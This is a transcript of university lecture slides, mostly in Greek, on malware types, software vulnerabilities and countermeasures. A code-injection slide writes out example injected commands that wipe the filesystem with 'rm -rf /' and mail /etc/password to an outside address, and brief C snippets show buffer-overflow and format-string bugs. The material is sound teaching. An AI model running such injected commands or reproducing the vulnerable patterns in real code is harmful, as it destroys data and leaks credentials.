Κακοβουλο Λογισμικο Επιθέσεις · Μακρο-ιοί (1/2) Οι...

79
Κακοβουλο Λογισμικο & Επιθέσεις Τμήμα Μηχανικών Πληροφοριακών και Επικοινωνιακών Συστημάτων Πανεπιστήμιο Αιγαίου

Transcript of Κακοβουλο Λογισμικο Επιθέσεις · Μακρο-ιοί (1/2) Οι...

Κακοβουλο Λογισμικο & Επιθέσεις

Τμήμα Μηχανικών Πληροφοριακών και Επικοινωνιακών Συστημάτων

Πανεπιστήμιο Αιγαίου

Πανεπιστήμιο Αιγαίου Περίληψη

Inside Intruders Code Bugs Malware

Πανεπιστήμιο Αιγαίου Inside Intruders

Logic Bombs – Job protection – Time bombs (virus)

Trap Door – System programmer

– Code review

Πανεπιστήμιο Αιγαίου Inside Intruders

Login Spoofing – Pubic computers (ex. university!) – Fake login interface – Special login sequence start (ex. CTRL-ALT-

DEL). Logs out last user…

Πανεπιστήμιο Αιγαίου Code Bugs

Πανεπιστήμιο Αιγαίου Code Bugs

Buffer Overflow Format string attacks Return to libc attack Code Injection Privilege Escalation OS specific

Πανεπιστήμιο Αιγαίου Buffer overflow

C language programming No array bounds checking Example

int i; char c[1024]; i=120000; c[i]=0;

Πανεπιστήμιο Αιγαίου Buffer overflow

Πανεπιστήμιο Αιγαίου Buffer overflow

Too many programs use C language Detecting:

– Test for very long file names – Unexpected core dump – Usually it is too late..

Πανεπιστήμιο Αιγαίου Format String Attack

The “lazy” attack Example

char *s=“Hello World”; printf(“%s”,s);

The lazy programmer char *s=“Hello World”; printf(s);

Πανεπιστήμιο Αιγαίου Format String Attack

Another programmer comes to the scene.. char s[100],g[100]=“Hello”; gets(s); strcat(g,s); printf(g);

Several string formats %d,%s,%n

Πανεπιστήμιο Αιγαίου Format String Attack

Πανεπιστήμιο Αιγαίου Integer overflow

Adding or multiplying result bigger than max

C cannot detect that Example: 16-bit

– 40000x40000=4096

Πανεπιστήμιο Αιγαίου Code Injection

Example copy a file to another using a system call

Πανεπιστήμιο Αιγαίου Code Injection

Three cases – Good: cp abc xyz – Bad: cp abc xyz;rm –rf/ – Ungly: Cp abc xyz; mail

[email protected]</etc/password

Πανεπιστήμιο Αιγαίου Κακόβουλο Λογισμικό

Πανεπιστήμιο Αιγαίου Η έννοια του Κακόβουλου

Λογισμικού Το Λογισμικό διαθέτει βούληση; Το Λογισμικό χαρακτηρίζεται με βάση την

πρόθεση του προγραμματιστή; – Παράδειγμα 1: Προγραμματιστής παράγει λογισμικό

με επιβλαβείς συνέπειες έχοντας γνώση των πράξεών του (δόλιοι σκοποί)

– Παράδειγμα 2: Προγραμματιστής παράγει λογισμικό με επιβλαβείς συνέπειες μη έχοντας γνώση των πράξεών του. Ενδεχόμενη άγνοια όσον αφορά στον τρόπο παραγωγής ασφαλούς λογισμικού.

Πανεπιστήμιο Αιγαίου

Εννοιολογική θεμελίωση Κακόβουλο Λογισμικό:

– το λογισμικό που περιέχει τις απαιτούμενες εντολές για μία επίθεση σε ένα υπολογιστικό σύστημα.

– …επίθεση: η παραβίαση (ή η απόπειρα

παραβίασης) της εμπιστευτικότητας, ακεραιότητας ή διαθεσιμότητας του συστήματος.

Πανεπιστήμιο Αιγαίου

Κριτήρια κατηγοριοποίησης 1) Αυτονομία

– ύπαρξη ανάγκης (ή μη) για λογισμικό-ξενιστή

2) Αναπαραγωγή – δυνατότητα αυτό-αναπαραγωγής (ή μη), όταν οι

συνθήκες το επιτρέπουν

Πανεπιστήμιο Αιγαίου Κατηγοριοποίηση

Κακόβουλο Λογισμικό

Απαιτεί ξενιστή Δεν απαιτεί ξενιστή

Κερκόπορτες Λογικές Βόμβες

Δούρειοι Ίπποι

Ιοί Βακτήρια Αναπαραγωγοί

Δεν αναπαράγονται Αναπαράγονται

Rootkits

Βots – zombies

Κατασκοπευτικό

λογισμικό

Πανεπιστήμιο Αιγαίου Είδη Κακόβουλου Λογισμικού

Ιομορφικό Κακόβουλο Λογισμικό

Μη Ιομορφικό Κακόβουλο Λογισμικό

Μόνιμη ζημιά στο σύστημα

Χαμηλή πιθανότητα Υψηλή πιθανότητα

Μηχανισμός αναπαραγωγής

Αναπαραγωγή χωρίς ανθρώπινη παρέμβαση

Αναπαραγωγή με ανθρώπινη παρέμβαση

Επεισόδια μεγάλης κλίμακας

Υψηλή πιθανότητα Χαμηλή πιθανότητα, με εξαιρέσεις

Δυσκολία εντοπισμού Χαμηλή Υψηλή

Στοχευμένη απόπειρα επίθεσης

Χαμηλή πιθανότητα Υψηλή πιθανότητα

Πανεπιστήμιο Αιγαίου

ΙΟΜΟΡΦΙΚΟ ΛΟΓΙςΜΙΚΟ

Πανεπιστήμιο Αιγαίου Ιομορφικό Λογισμικό

Ιός: τμήμα λογισμικού που: ενσωματώνει τον κώδικά του σε ένα

πρόγραμμα ξενιστή, αναπαράγεται με την αντιγραφή του εαυτού

του σε άλλα προγράμματα ξενιστές και εκτελείται στο παρασκήνιο.

Πανεπιστήμιο Αιγαίου

Ιομορφικό Λογισμικό: Κύκλος ζωής

Φάση επώασης – ο ιός παραμένει ανενεργός στο υπολογιστικό σύστημα και

ενεργοποιείται από κάποιο γεγονός (π.χ. έλευση χρονικής στιγμής, παρουσία κάποιου αρχείου)

Φάση αναπαραγωγής – δημιουργία αντιγράφων και ενδεχόμενη ενσωμάτωση σε

ξενιστές

Φάση ενεργοποίησης και εκτέλεσης – εκτέλεση σειράς ενεργειών (payload) με πιθανές επιβλαβείς

συνέπειες για το υπολογιστικό σύστημα που φιλοξενεί το ιομορφικό λογισμικό

Πανεπιστήμιο Αιγαίου

Ιομορφικό Λογισμικό: Βασικές υπορουτίνες

Υπορουτίνα αναζήτησης – αναζήτηση νέων ξενιστών

Υπορουτίνα αντιγραφής – δημιουργία αντιγράφου του ιού και ενσωμάτωση σε

νέο ξενιστή

Υπορουτίνα κατά του εντοπισμού – Παραμετροποίηση τρόπου λειτουργίας υπορουτίνας

αναζήτησης και υπορουτίνας αντιγραφής, με σκοπό την αποφυγή εντοπισμού του ιού από αντιβιοτικό λογισμικό

Πανεπιστήμιο Αιγαίου

Είδη Ιομορφικού Λογισμικού Ιοί Τομέα

Εκκίνησης

Παρασιτικοί Ιοί

Πολυμερείς Ιοί

Ιοί Διαμένοντες στην Κύρια Μνήμη

Κρυφοί Ιοί

Κρυπτογραφημένοι ιοί

Πολυμορφικοί ιοί

Ρετρο-Ιοί

Ιοί που διαγράφουν τμήμα του ξενιστή

Μακρο-Ιοί

Πανεπιστήμιο Αιγαίου Ιοί Τομέα Εκκίνησης

Τομέας Εκκίνησης (Boot Sector): – Ο τομέας του δίσκου που χρησιμοποιείται για την

εκκίνηση του λειτουργικού συστήματος – Ο εκτελέσιμος κώδικας που περιέχεται στον τομέα

εκκίνησης εκτελείται μόλις το υπολογιστικό σύστημα εντοπίσει την ύπαρξη δίσκου σε κάθε εκκίνηση του συστήματος

Οι ιοί τομέα εκκίνησης – Εγκαθίστανται στον τομέα εκκίνησης αντικαθιστώντας τις

υπάρχουσες ρουτίνες, τις οποίες τοποθετούν σε άλλο τμήμα του δίσκου και τις καλούν αφού εκτελεστούν οι ίδιοι πρώτα.

Πανεπιστήμιο Αιγαίου Παρασιτικοί Ιοί

Ένας παρασιτικός ιός προσαρτάται σε ένα εκτελέσιμο πρόγραμμα και μολύνει άλλα προγράμματα

Το μέγεθος του εκτελέσιμου αρχείου αυξάνεται Η θέση του ιού μέσα στον κώδικα του

εκτελέσιμου αρχείου μπορεί να είναι: – Στην αρχή του εκτελέσιμου αρχείου (Βλ. Σχήμα) – Στο τέλος του εκτελέσιμου αρχείου – Στη μέση του εκτελέσιμου αρχείου

Πανεπιστήμιο Αιγαίου Παρασιτικοί Ιοί

Πανεπιστήμιο Αιγαίου Πολυμερείς ιοί

Οι πολυμερείς ιοί (multipartite viruses) είναι ιοί που έχουν δύο τμήματα: – Όταν μολύνουν ένα εκτελέσιμο αρχείο ενεργούν

ως Παρασιτικοί Ιοί – Όταν μολύνουν έναν τομέα εκκίνησης ενεργούν

ως Ιοί Τομέα Εκκίνησης Παράδειγμα: Ghostball (1989) ο οποίος

προκαλούσε μόλυνση σε αρχεία .COM και σε τομείς εκκίνησης.

Πανεπιστήμιο Αιγαίου Ιοί Διαμένοντες στην Κύρια

Μνήμη Οι Ιοί Διαμένοντες στην Κύρια Μνήμη (resident

viruses) μετά την εκτέλεση του ξενιστή (εκτελέσιμο πρόγραμμα ή τομέας εκκίνησης δίσκου) αποκολλώνται από τον ξενιστή και τοποθετούνται στην Κύρια Μνήμη μέχρι τον τερματισμό της λειτουργίας του υπολογιστικού συστήματος

Σκοπός της παραμονής τους στην κύρια μνήμη: – Αποκτούν έλεγχο του συστήματος προσθέτοντας τον

εκτελέσιμο κώδικά τους στον κώδικα συχνά εκτελούμενων διακοπών λογισμικού

– Μολύνουν άλλους ξενιστές

Πανεπιστήμιο Αιγαίου Κρυφοί ιοί (1/2)

Οι κρυφοί ιοί (stealth viruses) αποκρύπτουν τη μόλυνση των αρχείων

Κάθε ιός κάνει αλλαγές στα αρχεία ή τομείς εκκίνησης που προσβάλλει

Τα αντιβιοτικά προγράμματα τηρούν μητρώο με αθροίσματα ελέγχου των αρχείων για ανίχνευση ιών

Οι κρυφοί ιοί αποκτούν έλεγχο των κλήσεων συστήματος που αφορούν στην πρόσβαση σε αρχεία.

Πανεπιστήμιο Αιγαίου

Κρυφοί ιοί (2/2) Όταν ένα πρόγραμμα ζητήσει, μέσω κλήσης

συστήματος, για ένα μολυσμένο αρχείο: – Τις ιδιότητες: ο κρυφός ιός επιστρέφει τις ιδιότητες

του αρχείου πριν μολυνθεί – Την ανάγνωση: ο κρυφός ιός επιστρέφει τα δεδομένα

του αρχείου πριν μολυνθεί – Την εκτέλεση του αρχείου: ο κρυφός ιός εκτελεί το

μολυσμένο αρχείο Παράδειγμα: Natas virus(1994). Γνωστός από

προβλήματα δικτύου που προκάλεσε στην Κεντρική Υπηρεσία Πληροφοριών των Ηνωμένων Πολιτειών

Πανεπιστήμιο Αιγαίου Κρυπτογραφημένοι ιοί

Ένας κρυπτογραφημένος ιός (encrypted virus) κρυπτογραφεί όλο το τμήμα του κώδικά του εκτός από μία μικρή ρουτίνα αποκρυπτογράφησης

Αποφεύγει την ανίχνευση από αντιβιοτικά προγράμματα που προσπαθούν να ανιχνεύσουν ιούς συγκρίνοντας τον κώδικα του αρχείου που ελέγχουν με ακολουθίες κώδικα ήδη ταυτοποιημένων ιών.

Παράδειγμα: Cascade, W95/Mad και W95/Zombie

Πανεπιστήμιο Αιγαίου Κρυπτογραφημένοι ιοί

Πανεπιστήμιο Αιγαίου Πολυμορφικοί ιοί

Τα αντιβιοτικά προγράμματα μπορούν να ανιχνεύσουν ένα κρυπτογραφημένο ιό ελέγχοντας ένα αρχείο σε σχέση με ταυτοποιημένες ρουτίνες αποκρυπτογράφησης.

Οι πολυμορφικοί ιοί (polymorphic viruses) μεταβάλουν τη μορφή τους κάθε φορά που προσβάλουν ένα αρχείο.

Αποτελούνται από κρυπτογραφημένους ιούς που μεταβάλουν τη ρουτίνα αποκρυπτογράφησης, με εισαγωγή εντολών που δεν επηρεάζουν την αποκρυπτογράφηση, μετά από κάθε προσβολή αρχείου.

Παράδειγμα: Virut, W32.Zelly

Πανεπιστήμιο Αιγαίου Πολυμορφικοί ιοί

Πανεπιστήμιο Αιγαίου Ρετρο-ιοί (1/2)

Οι ρετρο-ιοί (retro-virus ή antivirus virus) προσπαθούν να ανιχνεύσουν την ύπαρξη αντιβιοτικών προγραμμάτων και να τα καταστήσουν αναποτελεσματικά.

Εκμεταλλεύονται συγκεκριμένες στιγμές κατά τις οποίες τα αντιβιοτικά προγράμματα είναι «ευάλωτα» (π.χ. κατά την ενημέρωσή τους).

Πανεπιστήμιο Αιγαίου Ρετρο-ιοί (2/2)

Η ονομασία τους αντανακλά την ομοιότητά τους με βιολογικούς ιούς που μολύνουν τα κύτταρα ενός οργανισμού, ενσωματώνοντας το γενετικό τους υλικό σε αυτά και τα χρησιμοποιούν για τον πολλαπλασιασμό τους.

Παραδείγματα: Cybertech, Firefly, Goldbug

Πανεπιστήμιο Αιγαίου Ιοί που διαγράφουν τμήμα του ξενιστή

Συνήθως οι ιοί διατηρούν την αρχική λειτουργικότητα των εκτελέσιμων αρχείων που προσβάλουν για να μην γίνουν αντιληπτοί

Οι Ιοί που διαγράφουν τμήμα του ξενιστή (overwriters) ή όλα τα περιεχόμενα του ξενιστή

Αυτό τους καθιστά ιδιαίτερα ανιχνεύσιμους. Παράδειγμα: Grog.202/456, Loveletter

Πανεπιστήμιο Αιγαίου Μακρο-ιοί (1/2)

Οι μακρο-ιοί αποτελούνται από ακολουθία εντολών η οποία διερμηνεύεται αντί να εκτελείται

Οι προηγούμενοι ιοί χρησιμοποιούν ως ξενιστές εκτελέσιμα αρχεία.

Οι μακρο-ιοί εκμεταλλεύονται προγράμματα (όπως Microsoft Office) που επιτρέπουν στο χρήστη την αποθήκευση εντολών (μακροεντολές) σε αρχεία δεδομένων.

Οι μακροεντολές αυτοματοποιούν πολύπλοκες και επαναλαμβανόμενες εργασίες.

Πανεπιστήμιο Αιγαίου Μακρο-ιοί (2/2)

Οι μακροεντολές ενεργοποιούνται είτε με παρέμβαση του χρήστη ή με την έλευση κάποιου γεγονότος (π.χ. άνοιγμα του αρχείου)

Όταν ενεργοποιηθεί η μακροεντολή έχει τη δυνατότητα να αντιγραφεί σε αρχεία δεδομένων ίδιου τύπου, να διαγράψει αρχεία ή να προκαλέσει άλλη μεταβολή στο σύστημα αρχείων.

Οι μακρο-ιοί: – Είναι ανεξάρτητοι από το Λειτουργικό Σύστημα και το

Υλικό – Αναπαράγονται πολύ εύκολα

Πανεπιστήμιο Αιγαίου ΜΗ ΙΟΜΟΡΦΙΚΟ ΚΑΚΟΒΟΥΛΟ ΛΟΓΙςΜΙΚΟ

Πανεπιστήμιο Αιγαίου Κερκόπορτες

Οι κερκόπορτες (backdoors ή trapdoors) είναι σημεία εισόδου που επιτρέπουν την πρόσβαση σε ένα σύστημα, παρακάμπτοντας τη συνηθισμένη διαδικασία ελέγχου πρόσβασης

Χρησιμοποιούνται από προγραμματιστές για νομότυπους σκοπούς κατά τον έλεγχο και την αποσφαλμάτωση εφαρμογών

Επίσης, τοποθετούνται από εισβολείς συστημάτων (hackers) μετά από επιτυχημένη απόπειρα μη εξουσιοδοτημένης πρόσβασης

Πανεπιστήμιο Αιγαίου Rootkits

Ένα λογισμικό rootkit συνήθως δημιουργεί κερκόπορτες (backdoors) που θα επιτρέψουν τη μετέπειτα απομακρυσμένη διαχείριση του ξενιστή από κάποιον τρίτο

Λειτουργεί σε πολύ χαμηλό επίπεδο στο Λ.Σ., και συνήθως ενσωματώνει λειτουργίες απόκρυψης - stealth ώστε να παρακάμπτει τους μηχανισμούς πρόληψης και ανίχνευσης.

Πανεπιστήμιο Αιγαίου Βots – zombies

Κακόβουλο λογισμικό που προσβάλλει Η/Υ καθιστώντας τους μέλη ενός δικτύου Η/Υ (botnet) που ελέγχεται εξ’ αποστάσεως από τρίτους

Ένας Η/Υ που έχει μολυνθεί από ένα bot συχνά αναφέρεται ως «zombie».

Οι Η/Υ –zombies μπορεί να χρησιμοποιηθούν για επιθέσεις DDOS σε εξυπηρετητές Web, για την αποστολή μηνυμάτων spam, για την πραγματοποίηση επιθέσεων παραπλάνησης (phishing) κ.λ.π.

Πανεπιστήμιο Αιγαίου Λογικές βόμβες

Μία λογική βόμβα (logic bomb) είναι κώδικας που εσκεμμένα τοποθετείται στο λογισμικό και εκτελεί μία ενέργεια, η οποία παραβιάζει την πολιτική ασφαλείας ενός συστήματος, όταν πληρείται κάποια λογική συνθήκη στο σύστημα.

Όταν η συνθήκη αναφέρεται σε συγκεκριμένη χρονική στιγμή αναφερόμαστε σε χρονικές βόμβες.

Πανεπιστήμιο Αιγαίου Δούρειοι ίπποι (1/2)

Οι Δούρειοι ίπποι (trojan horses) είναι φαινομενικά χρήσιμα προγράμματα που περιλαμβάνουν κρυφές λειτουργίες, οι οποίες μπορούν να εκμεταλλευτούν τα δικαιώματα του χρήστη που εκτελεί το πρόγραμμα, με συνέπεια μια απειλή στην ασφάλεια του συστήματος.

Εκτελεί λειτουργίες που ο χρήστης του δε σκόπευε.

Πανεπιστήμιο Αιγαίου Δούρειοι ίπποι (2/2)

Δεν αναπαράγονται μόνοι τους. Βασίζονται στο χρήστη για την εγκατάσταση και εκτέλεσή τους.

Παράδειγμα: Έστω ένας δικτυακός χώρος όπου κάθε χρήστης έχει αρχεία που μπορεί να προσπελάσει. Ένας δούρειος ίππος με τη μορφή μιας χρήσιμης εφαρμογής που θα μπορούσε (εφόσον εκτελεστεί από ένα χρήστη του δικτύου) να αλλάξει τα δικαιώματα προσπέλασης των αρχείων του χρήστη και να επιτρέπει και σε άλλους χρήστες να τα επεξεργαστούν.

Πανεπιστήμιο Αιγαίου Αναπαραγωγοί

Οι αναπαραγωγοί (worms) είναι προγράμματα που μεταδίδονται από έναν υπολογιστή σε έναν άλλο, δημιουργώντας αντίγραφα του εαυτού τους. Δεν απαιτούν ξενιστή. Έχει τον ίδιο κύκλο ζωής με έναν ιό:

– Αναζητά συστήματα που μπορεί να εξαπλωθεί – Δημιουργεί σύνδεση με το σύστημα αυτό – Δημιουργεί κλώνο του στο απομακρυσμένο

σύστημα

Πανεπιστήμιο Αιγαίου Morris Worm (1988)

Damage: 6000 computers in just a few hours What: just copied itself; didn’t touch data Exploited:

– buffer overflow in finger (UNIX) – sendmail debug mode (exec arbitrary cmds) – dictionary of 432 frequently used passwords

Πανεπιστήμιο Αιγαίου Morris Worm (1988)

Lessons Learned from Morris – Diversity is good. – Big programs have many exploitable bugs. – Choose good passwords. – Don’t shut down mail servers: did prevent worm

from spreading but also shut down defense – Computer Emergency Response Team

Πανεπιστήμιο Αιγαίου Βακτήρια

Τα βακτήρια (bacteria) αναπαράγονται όπως οι ιοί, αλλά δεν απαιτούν ξενιστή.

Δεν αλλοιώνουν δεδομένα σκόπιμα. Μοναδικός σκοπός τους είναι να αναπαραχθούν σε ένα ή περισσότερα αντίγραφα.

Δεν εκτελούν κάποια επιζήμια ενέργεια, αλλά καταναλώνουν πόρους του συστήματος, προσβάλλοντας τη διαθεσιμότητά του.

Πανεπιστήμιο Αιγαίου Παραπλανητική πληροφόρηση

Είναι η διάδοση ψευδούς φήμης σχετικά με την ύπαρξη κακόβουλου λογισμικού (hoaxes)

Παράδειγμα: Good times – Κυκλοφόρησε μέσω ηλεκτρονικού ταχυδρομείου – Διέδωσε την ψευδή είδηση ενός νέου ιού με το

όνομα Good Times – Οδήγησε σε επάλληλη αποστολή του από

αποδέκτη σε αποδέκτη, προσπάθεια ανεύρεσης αντιβιοτικού προγράμματος

Πανεπιστήμιο Αιγαίου Κατασκοπευτικό λογισμικό

Το κατασκοπευτικό λογισμικό έχει σκοπό την παρακολούθηση - υποκλοπή ευαίσθητων δεδομένων (spyware), ή την αποστολή ανεπιθύμητων διαφημιστικών μηνυμάτων (adware).

Συνήθως το λογισμικό παρακολούθησης συνεργάζεται με το λογισμικό ανεπιθύμητης διαφήμισης , π.χ παρακολούθηση της αγοραστικής συμπεριφοράς στο διαδίκτυο και στη συνέχεια αποστολή/εμφάνιση διαφημιστικών μηνυμάτων.

Πανεπιστήμιο Αιγαίου ΑΝΤΙΜΕΤΩΠΙςΗ ΚΑΚΟΒΟΥΛΟΥ

ΛΟΓΙςΜΙΚΟΥ

Πανεπιστήμιο Αιγαίου Ιδιαιτερότητες των απειλών

από Κακόβουλο Λογισμικό – Γενικότητα απειλών: Το Κακόβουλο Λογισμικό δεν

εκμεταλλεύεται συγκεκριμένα ελαττώματα των Λειτουργικών Συστημάτων που προσβάλλει.

– Έκταση απειλών: Μία απειλή προερχόμενη από Κακόβουλο Λογισμικό μπορεί να επεκταθεί από ένα υπολογιστικό σύστημα σε ένα άλλο.

– Αναποτελεσματικότητα εφεδρικών αντιγράφων ασφαλείας: Το αντίγραφο μπορεί να περιέχει αντίγραφο του Κακόβουλου Λογισμικού.

Πανεπιστήμιο Αιγαίου Εξάπλωση Κακόβουλου

Λογισμικού Η αυξανόμενη εξάπλωση οφείλεται:

– στην εξάπλωση της χρήσης των δικτύων δεδομένων

– στην έλλειψη διαχωρισμού μεταξύ αρχείων δεδομένων και εκτελέσιμων αρχείων (π.χ.μακρο-εντολές σε αρχεία δεδομένων)

– στην έλλειψη επίγνωσης από τελικούς χρήστες και διαχειριστές συστημάτων

– στην αναποτελεσματικότητα παραδοσιακών μηχανισμών ελέγχου πρόσβασης

Πανεπιστήμιο Αιγαίου

Τρόποι εξάπλωσης Μέσω ηλεκτρονικής αλληλογραφίας Μέσω αφαιρούμενων αποθηκευτικών μέσων Μέσω Web Μέσω άλλων υπηρεσιών διαδικτυακής

επικοινωνίας Μέσω Δικτύων (LAN, WAN)

Πανεπιστήμιο Αιγαίου Κύριες επιπτώσεις

Υποκλοπή δεδομένων και πληροφοριών ή κλήσεις (dialers) με υπεραστική χρέωση

Ενοχλητικά μηνύματα, διαφημίσεις Διαγραφή ή αλλοίωση δεδομένων, εφαρμογών

και αρχείων συστήματος Αναστολή λειτουργίας ή δυσλειτουργία του Λ.Σ. Καταστροφή των τομέων εκκίνησης Απώλεια διαθεσιμότητας πόρων του συστήματος

Πανεπιστήμιο Αιγαίου Αντίμετρα κατά

Κακόβουλου Λογισμικού Κατηγορίες αντίμετρων:

– Πρόληψη – Ανίχνευση – Επανόρθωση

Η συνδυασμένη χρήση των τριών κατηγοριών αντίμετρων οδηγεί σε: – Ελαχιστοποίηση των προσβολών από Κακόβουλο

Λογισμικό, ή – Ελαχιστοποίηση της ζημίας που μπορεί να επιφέρει η

προσβολή από Κακόβουλο Λογισμικό

Πανεπιστήμιο Αιγαίου Επιλογή αντίμετρων κατά

Κακόβουλου Λογισμικού Η επιλογή αντίμετρων (οφείλει να) είναι το τελικό

στάδιο της Ανάλυσης Επικινδυνότητας

Η αυθαίρετη επιλογή αντιμέτρων ενδέχεται να οδηγήσει: – σε κενά ασφαλείας (μη αναγνωρισμένες ευπάθειες του

συστήματος), ή

– σε σπατάλη πόρων, χωρίς αντίστοιχο όφελος για την Ασφάλεια του Πληροφοριακού Συστήματος που προστατεύεται

Πανεπιστήμιο Αιγαίου

Με κριτήριο τον τρόπο δράσης του κακόβουλου λογισμικού

ΚΑΤΗΓΟΡΙΕΣ ΑΝΤΙΜΕΤΡΩΝ ΚΑΤΑ ΤΟΥ ΚΑΚΟΒΟΥΛΟΥ ΛΟΓΙςΜΙΚΟΥ

Πανεπιστήμιο Αιγαίου Κατηγοριοποίηση Αντιμέτρων (1/5):

Κακόβουλο λογισμικό ως δεδομένα και ως εντολές

Στηρίζεται στην ιδιότητα του κακόβουλου λογισμικού κατά την εισαγωγή του να αποτελεί δεδομένο και κατά την εκτέλεσή του εντολή.

Τρόπος αντιμετώπισης: όλα τα αρχεία θεωρούνται δεδομένα έως το αίτημα εκτέλεσης – Έλεγχος και πιστοποίηση (από το διαχειριστή

συστήματος) για να επιτρέπεται η εκτέλεση – Οποιαδήποτε μεταβολή σε πιστοποιημένο εκτελέσιμο

αρχείο πρέπει να το καθιστά μη εκτελέσιμο, έως ότου ο διαχειριστής πιστοποιήσει εκ νέου το αρχείο αυτό ως εκτελέσιμο

Πανεπιστήμιο Αιγαίου

Κατηγοριοποίηση Αντιμέτρων 2(5)

Κακόβουλο Λογισμικό που εκμεταλλεύεται τα δικαιώματα του χρήστη – Ελαχιστοποίηση των αντικειμένων του συστήματος

στα οποία έχουν πρόσβαση οι χρήστες: • Μετρικές Ροής Πληροφορίας: μία πληροφορία είναι

διαθέσιμη σε μία διεργασία μόνον όταν η απόστασή της είναι μικρότερη από κάποια τιμή

• Μείωση των δικαιωμάτων του χρήστη: δυναμική μείωση των ενεργών δικαιωμάτων ενός ύποπτου εκτελέσιμου, με πρωτοβουλία του χρήστη

• Εκτέλεση σε περιορισμένο περιβάλλον: στατικός και δυναμικός έλεγχος ύποπτων προγραμμάτων (sandboxing)

Πανεπιστήμιο Αιγαίου

Κατηγοριοποίηση Αντιμέτρων 3(5)

Διάσχιση Τομέων Προστασίας – Όταν εφαρμόζεται Υποχρεωτικός Έλεγχος

Προσπέλασης (Mandatory Access Control – MAC) και Πεδία Προστασίας (Protection Domains)

– Τα υπό προστασία προγράμματα τοποθετούνται στο χαμηλότερο επίπεδο της Πολιτικής Ασφαλείας

– Το συγκεκριμένο αντίμετρο ελαχιστοποιεί παράλληλα και τη δυνατότητα διαμοιρασμού προγραμμάτων από τους χρήστες

Έλεγχος Ακεραιότητας Αρχείων – Κωδικοί Ανίχνευσης Παραβίασης: Κρυπτογραφικά

αθροίσματα ελέγχου για τον έλεγχο της ακεραιότητας των αρχείων

Πανεπιστήμιο Αιγαίου

Κατηγοριοποίηση Αντιμέτρων 4(5)

Έλεγχος ενεργειών που δεν αναφέρονται στις προδιαγραφές – Εκ των προτέρων υπολογισμός κρυπτογραφικού

αθροίσματος ελέγχου για κάθε ακολουθία μη διακλαδωμένων εντολών σε ένα πρόγραμμα

– Υπολογισμός των κρυπτογραφικών αθροισμάτων ελέγχου κατά την εκτέλεση. Σε περίπτωση διαφορών, η ακεραιότητα του προγράμματος έχει παραβιασθεί.

– Απαιτεί ιδιαίτερες διαδικασίες για τη διαχείριση των κλειδιών και πιθανόν μειώνει την απόδοση του υπολογιστικού συστήματος σε μεγάλο βαθμό.

Πανεπιστήμιο Αιγαίου

Κατηγοριοποίηση Αντιμέτρων 5(5)

Κρυπτογραφικός έλεγχος ασφάλειας κώδικα – Διαπίστευση εκτελέσιμου προγράμματος ως προς την

ασφάλεια εκτέλεσής του – Ο καταναλωτής του κώδικα (χρήστης) προσδιορίζει

απαιτήσεις ασφάλειας ενός προγράμματος – Ο παραγωγός του κώδικα (προγραμματιστής) παράγει

κρυπτογραφική απόδειξη ότι ο κώδικας ικανοποιεί αυτές τις απαιτήσεις

– Η διαπίστευση είναι δυνατόν να επαληθευθεί κρυπτογραφικά από τον καταναλωτή του κώδικα (χρήστη του προγράμματος). Σε περίπτωση μη επαλήθευσης, ο χρήστης δεν εκτελεί το πρόγραμμα

Πανεπιστήμιο Αιγαίου ΤΕΧΝΙΚΕΣ ΑΝΤΙΜΕΤΩΠΙςΗΣ

ΚΑΚΟΒΟΥΛΟΥ ΛΟΓΙςΜΙΚΟΥ

Πανεπιστήμιο Αιγαίου Τεχνικές Αντιμετώπισης Κακόβουλου

Λογισμικού 1(4) Επίγνωση σε θέματα ασφαλείας

– επίγνωση σε θέματα Κακόβουλου Λογισμικού – γνώση χειρισμού εφαρμογών κατά Κακόβουλου Λογισμικού – αποφυγή μεταφόρτωσης και εγκατάστασης μη ελεγμένων

προγραμμάτων ή προγραμμάτων από άγνωστες ή μη έμπιστες πηγές Αντιβιοτικό Λογισμικό

– εφαρμογές που ανιχνεύουν την ύπαρξη ιών και τους αφαιρούν από τα αρχεία ξενιστές, ή απομονώνουν τα αρχεία ξενιστές

Αρχεία Ελέγχου του Λειτουργικού Συστήματος – εξέταση των Αρχείων Ελέγχου για δραστηριότητα που προδίδει

Κακόβουλο Λογισμικό

Πανεπιστήμιο Αιγαίου Τεχνικές Αντιμετώπισης Κακόβουλου

Λογισμικού 2(4) Αυστηρά μέτρα ασφαλείας

– αυστηρά δικαιώματα πρόσβασης – εκτέλεση εφαρμογών με τα ελάχιστα δικαιώματα που απαιτούν (least

privilege) Απαγόρευση μεταφόρτωσης εκτελέσιμου κώδικα

– έλεγχος και περιορισμός του κώδικα που είναι δυνατόν να μεταφορτωθεί

Απομόνωση – δικτυακή απομόνωση τμημάτων Πληροφοριακών Συστημάτων που

περιέχουν διαβαθμισμένες πληροφορίες, από άλλα τμήματα που περιέχουν μη διαβαθμισμένες πληροφορίες

– απομόνωση τμημάτων Πληροφοριακών Συστημάτων που επικοινωνούν με εξωτερικά ΠΣ, από τα υπόλοιπα τμήματα του ΠΣ ενός οργανισμού (Demilitarised Zone)

Πανεπιστήμιο Αιγαίου Τεχνικές Αντιμετώπισης Κακόβουλου

Λογισμικού 3(4) Αναχώματα Ασφαλείας (firewalls)

– περιορισμός της δυνατότητας του Κακόβουλου Λογισμικού να εξαπλωθεί σε περισσότερα συστήματα ενός ΠΣ

Εργαλεία Ανίχνευσης Εισβολών – ανίχνευση Κακόβουλου Λογισμικού με βάση γνωστές συμπεριφορές

τυπικών προγραμμάτων Κακόβουλου Λογισμικού – Ανίχνευση Κακόβουλου Λογισμικού με βάση συμπεριφορές που

διαφέρουν από τις τυπικές συμπεριφορές έγκυρων χρηστών Συνεργασία με τους οργανισμούς που προσφέρουν προϊόντα

υλικού και λογισμικού για προστασία από Κακόβουλο Λογισμικό – ενημέρωση των οργανισμών αυτών σε περίπτωση εμφάνισης

προγράμματος που ενδέχεται να συνιστά Κακόβουλο Λογισμικό άλλα δεν έχει ήδη καταγραφεί

Πανεπιστήμιο Αιγαίου Τεχνικές Αντιμετώπισης Κακόβουλου

Λογισμικού 4(4) Διατυπωμένη διαδικασία ανάνηψης από προσβολή,

και περιορισμού Κακόβουλου Λογισμικού – Απομόνωση προσβεβλημένων συστημάτων – Απομάκρυνση Κακόβουλου Λογισμικού από

προσβεβλημένο σύστημα – Αποκατάσταση ακεραιότητας προσβεβλημένου

συστήματος – Η διαδικασία πρέπει να είναι τεκμηριωμένη και γνωστή εκ

των προτέρων σε όσους οφείλουν να την ακολουθήσουν – Ενημέρωση τελικών χρηστών σχετικά με ενδεχόμενες

ενέργειες που οφείλουν να κάνουν οι ίδιοι σε περίπτωση εμφάνισης εφαρμογών που ενδέχεται να συνιστούν Κακόβουλο Λογισμικό

